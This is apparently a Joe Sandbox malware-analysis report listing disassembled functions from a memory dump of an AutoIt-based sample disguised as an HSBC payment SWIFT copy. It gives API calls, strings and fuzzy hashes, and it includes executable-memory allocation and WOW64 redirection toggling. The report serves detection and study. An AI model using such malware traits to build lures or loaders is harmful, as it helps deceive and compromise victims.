GetWindowLongW.USER32 ref: 007A79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A7A0C

Strings

SysTreeView32, xrefs: 007A79B1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a1f65d59fe0bcfd2555ec61f95417a5bf58343012853f679c4fb8d646cbb7974
Instruction ID: 25c2b1f120893f7479dcae4e2284a1f0836ebf34d3322e81c64df185acabd8f4
Opcode Fuzzy Hash: a1f65d59fe0bcfd2555ec61f95417a5bf58343012853f679c4fb8d646cbb7974
Instruction Fuzzy Hash: 4531D031204606AFDB158E78DC45BEB77A9EB8A324F208725F875922E1D738ED51CB50

Function 007A73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007A7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007A7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 007A7499

Strings

SysMonthCal32, xrefs: 007A742C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: e037f52367a93d58c547a29679937da10280d3ec71a9658fb20dbef7a75f9955
Instruction ID: 7fa349bb2d5c70d098482a503968f3fae1d416964eeddbb7f0fcf978144dc5c6
Opcode Fuzzy Hash: e037f52367a93d58c547a29679937da10280d3ec71a9658fb20dbef7a75f9955
Instruction Fuzzy Hash: 4B21A132600258ABDF158FA4CC46FEA3B7AEF8D724F110214FE156B1D0DA79AC51DBA0

Function 007A7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007A7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007A7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007A7C5F

Strings

msctls_updown32, xrefs: 007A7BC4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6da7f5c677416034bdea1e73956b8ef2deb216c56313b27a95ae977fffdcc129
Instruction ID: 3f12e90938d8d526dd9f94f256ba706e2a6ec1617fb2120eab542bbf86f4e819
Opcode Fuzzy Hash: 6da7f5c677416034bdea1e73956b8ef2deb216c56313b27a95ae977fffdcc129
Instruction Fuzzy Hash: B6219CB5600208AFEB14DF24DCC1CB637ACEB9A364B144159FA009B3A1CB39EC11CAB0

Function 007A6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007A6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007A6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007A6D70

Strings

Listbox, xrefs: 007A6D08

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b7513aaa3e9e93418e2c874f2ceb88ff1192261b1b3e54a0cdf1e1c9573a386a
Instruction ID: 823d84068781038cd95150401239d45f06fa2d42b32d67c9c66b43d26ceaeec7
Opcode Fuzzy Hash: b7513aaa3e9e93418e2c874f2ceb88ff1192261b1b3e54a0cdf1e1c9573a386a
Instruction Fuzzy Hash: 44219232711118BFDF118F54DC45EBB3BBAEFCA760F058224FA459B1A0C679AC519BA0

Function 007939E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00793A66

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Strings

%{, xrefs: 007939F4
, $, xrefs: 00793AA6
AUTOITCALLVARIABLE%d, xrefs: 00793A58

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%{
API String ID: 3506404897-390091804
Opcode ID: 7e76c1c7c9813c71227eb0b7baf38c0136f1eeb3ed55af118b63ac909ae49947
Instruction ID: e582dc5986933b95014ce259eaf724be8cba0874993b8a1f214cb24c37bb5578
Opcode Fuzzy Hash: 7e76c1c7c9813c71227eb0b7baf38c0136f1eeb3ed55af118b63ac909ae49947
Instruction Fuzzy Hash: D6218171600129EFCF14EF64DC85EAE77B9EF44300F408459F559A7281DB39EA45CB62

Function 007A770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007A7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007A7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007A7794

Strings

msctls_trackbar32, xrefs: 007A7749

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 993d34495d47f29d623e8147cbbbedd44fe764b28e97cdbd7ae26ddd45c6dc25
Instruction ID: 09811dfc60336af4e31e30a294a905ae16e68f878779101a9d0d29a0866f0767
Opcode Fuzzy Hash: 993d34495d47f29d623e8147cbbbedd44fe764b28e97cdbd7ae26ddd45c6dc25
Instruction Fuzzy Hash: 5D110672244208BFEF245F75CC45FEB77A9EFCAB54F114229FA41A60A0D676E811CB20

Function 00746B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00746B93
__calloc_crt.LIBCMT ref: 00746BAC

Strings

}, xrefs: 00746BD1
@B~, xrefs: 00746BC3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __calloc_crt
String ID: }$@B~
API String ID: 3494438863-1696300617
Opcode ID: 2d14652700d7e946f999e4a926121fd6df6c2938203614b4eb7b375b34e48a1b
Instruction ID: eca0705d03ca31bb9d7c4a360ebe6b87370f05fa6e907f3a4a680385e7bd14aa
Opcode Fuzzy Hash: 2d14652700d7e946f999e4a926121fd6df6c2938203614b4eb7b375b34e48a1b
Instruction Fuzzy Hash: 3CF068F5605A198BF7649F54BC91B6627D9F706734B70442AE300CE290EB7C8C41C6DA

Function 00749B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00749B94

Part of subcall function 00749C0B: __mtinitlocknum.LIBCMT ref: 00749C1D
Part of subcall function 00749C0B: EnterCriticalSection.KERNEL32(00000000,?,00749A7C,0000000D), ref: 00749C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00749BA4

Part of subcall function 00749100: ___addlocaleref.LIBCMT ref: 0074911C
Part of subcall function 00749100: ___removelocaleref.LIBCMT ref: 00749127
Part of subcall function 00749100: ___freetlocinfo.LIBCMT ref: 0074913B

Strings

8}, xrefs: 00749B85
8}, xrefs: 00749B8A, 00749B9F, 00749BAB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8}$8}
API String ID: 547918592-1526444488
Opcode ID: 133b53c991ca17357dc965adb72e12632c9ce6b7ab5146e4fa4be1bfed77ff01
Instruction ID: 2e9f0f6e6ffe692ae581df950854e3f94f9226c5f60e8d1b5a8d51e06ba9123f
Opcode Fuzzy Hash: 133b53c991ca17357dc965adb72e12632c9ce6b7ab5146e4fa4be1bfed77ff01
Instruction Fuzzy Hash: C8E08CF1983708FAEA92BBE4690BF1E2770AB00B21F20415BF155595C1CF7C2400C62B

Function 00724C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00724B83,?), ref: 00724C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00724C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00724C50
kernel32.dll, xrefs: 00724C3F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 1a090bbe50735bb416a82acade521d006238f57430e08ad4df9eedaea3a89ee7
Instruction ID: b596d3b5993d1e108fbbb640d82a6473dc06d10ef82f3ced14c32e321e299b06
Opcode Fuzzy Hash: 1a090bbe50735bb416a82acade521d006238f57430e08ad4df9eedaea3a89ee7
Instruction Fuzzy Hash: 88D0C7B0500B23CFC7209FB5E80821A72E6AF02341B20C83AE492E6260E678C8C0CA20

Function 00724C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00724BD0,?,00724DEF,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00724C23

Strings

kernel32.dll, xrefs: 00724C0C
Wow64DisableWow64FsRedirection, xrefs: 00724C1D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 13687aeba9cafec2f18a1115bff97af6d96f5e06e4ed155d91714e6f9ed1bad7
Instruction ID: 14cafdb498f403c6a9a448b80ac14be438ee883305dbc5053e976471d6eb281c
Opcode Fuzzy Hash: 13687aeba9cafec2f18a1115bff97af6d96f5e06e4ed155d91714e6f9ed1bad7
Instruction Fuzzy Hash: 61D01270511723CFD720AFB5ED48646B6E6EF4A352B11CC3AD486D6150E6B8D4C0C664

Function 007A0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007A1039), ref: 007A0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007A0E07

Strings

advapi32.dll, xrefs: 007A0DF0
RegDeleteKeyExW, xrefs: 007A0E01

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 85931ddb89a5ef378a15bda1907c9f8f24f3846145c74960307f103b82515c90
Instruction ID: 75766b6928d4264527ca2d0c4ec988dceb082b97f83e74286c150abd5cbf68db
Opcode Fuzzy Hash: 85931ddb89a5ef378a15bda1907c9f8f24f3846145c74960307f103b82515c90
Instruction Fuzzy Hash: 97D0C270440316CFC3206FB0D80824276E5AF52341F00CC7ED582C2290D6B8D4A0C644

Function 007990E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00798CF4,?,007AF910), ref: 007990EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00799100

Strings

kernel32.dll, xrefs: 007990E9
GetModuleHandleExW, xrefs: 007990FA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 916181810b8ad321dcb4d5ce654821d5e2f99a5c97a198ee25417fe020d11d5a
Instruction ID: 04d179c2c9c3feaeb36933fccbf32f7f8c1583dc343790c80f73902d85d985f3
Opcode Fuzzy Hash: 916181810b8ad321dcb4d5ce654821d5e2f99a5c97a198ee25417fe020d11d5a
Instruction Fuzzy Hash: 38D0C270550717CFDB209F75D80820272F5AF02342B15CC3ED481C2150E678C480C650

Function 00761714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00761718
__swprintf.LIBCMT ref: 00761749

Strings

%.3d, xrefs: 00761723
WIN_XPe, xrefs: 00761788

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 0ad7af6990aa732a19755243038d9a3b3a5189f6d711996af3dfb574309c8a9f
Instruction ID: 46ff38917f0eda972491a0b18513ba5f5cee962d2f3a56f643c26c4f40183384
Opcode Fuzzy Hash: 0ad7af6990aa732a19755243038d9a3b3a5189f6d711996af3dfb574309c8a9f
Instruction Fuzzy Hash: ACD017B1804119EACB409A90988C8BD737CAB19301FA80462F90BE2080E23E9B94EB21

Function 0077717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5c00832fcf44a9dc9afa6ab8f663f683bde5aa465eb5d883c4583b7ef3bb5c
Instruction ID: eee69dac7ff18c6180029741d0976e1e3fa9106e8257c56e4654cbe877dfd9cf
Opcode Fuzzy Hash: 1f5c00832fcf44a9dc9afa6ab8f663f683bde5aa465eb5d883c4583b7ef3bb5c
Instruction Fuzzy Hash: 98C17E74A04216EFCF18CFA4C884EAEBBB5FF48754B158598E809EB251D734ED81DB90

Function 0079E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0079E0BE
CharLowerBuffW.USER32(?,?), ref: 0079E101

Part of subcall function 0079D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0079D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0079E301
_memmove.LIBCMT ref: 0079E314

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 4a28319d73e34126e86e6a01376a1bc7d09c321afe7fb04a006680880aea783b
Instruction ID: 170da52f3819815f889e1bfa8992ebcff78389b1d605886d308e9cdc534ed973
Opcode Fuzzy Hash: 4a28319d73e34126e86e6a01376a1bc7d09c321afe7fb04a006680880aea783b
Instruction Fuzzy Hash: AAC17971A08311DFCB04DF28D484A6ABBE4FF89714F04896EF9999B351D734E946CB82

Function 00798093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007980C3
CoUninitialize.OLE32 ref: 007980CE

Part of subcall function 0077D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077D5D4

VariantInit.OLEAUT32(?), ref: 007980D9
VariantClear.OLEAUT32(?), ref: 007983AA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 6b903381018578ef3abbadbcba6f1ecb079945868d0842ffe0a2f8e8ca17712d
Instruction ID: 5a7490938cc3746c2256026d904ad674199aca83b318ec744a8bf8bc42a2fdbe
Opcode Fuzzy Hash: 6b903381018578ef3abbadbcba6f1ecb079945868d0842ffe0a2f8e8ca17712d
Instruction Fuzzy Hash: 01A15975604711DFCB40DF64D485A2AB7E4BF8A714F08844CFA969B3A1CB38EC44CB86

Function 0077687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0077688E
SysAllocString.OLEAUT32(00000000), ref: 00776937
VariantCopy.OLEAUT32 ref: 00776966
VariantClear.OLEAUT32(?), ref: 0077698D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c1cbf54b496683df70cb58fef55538c032519c89d4a93e41ba0c2eccaf50a43c
Instruction ID: c89ca8f1d24904b3d86e5c861641cc6d50cd71c906d8358bea92b77194657b04
Opcode Fuzzy Hash: c1cbf54b496683df70cb58fef55538c032519c89d4a93e41ba0c2eccaf50a43c
Instruction Fuzzy Hash: C951D374704B01DACF24AF65D895A3AB3E5AF45390F24C81FE68EDB295DB3CD8808B45

Function 007A97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0119ECA8,?), ref: 007A9863
ScreenToClient.USER32(00000002,00000002), ref: 007A9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007A9903

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
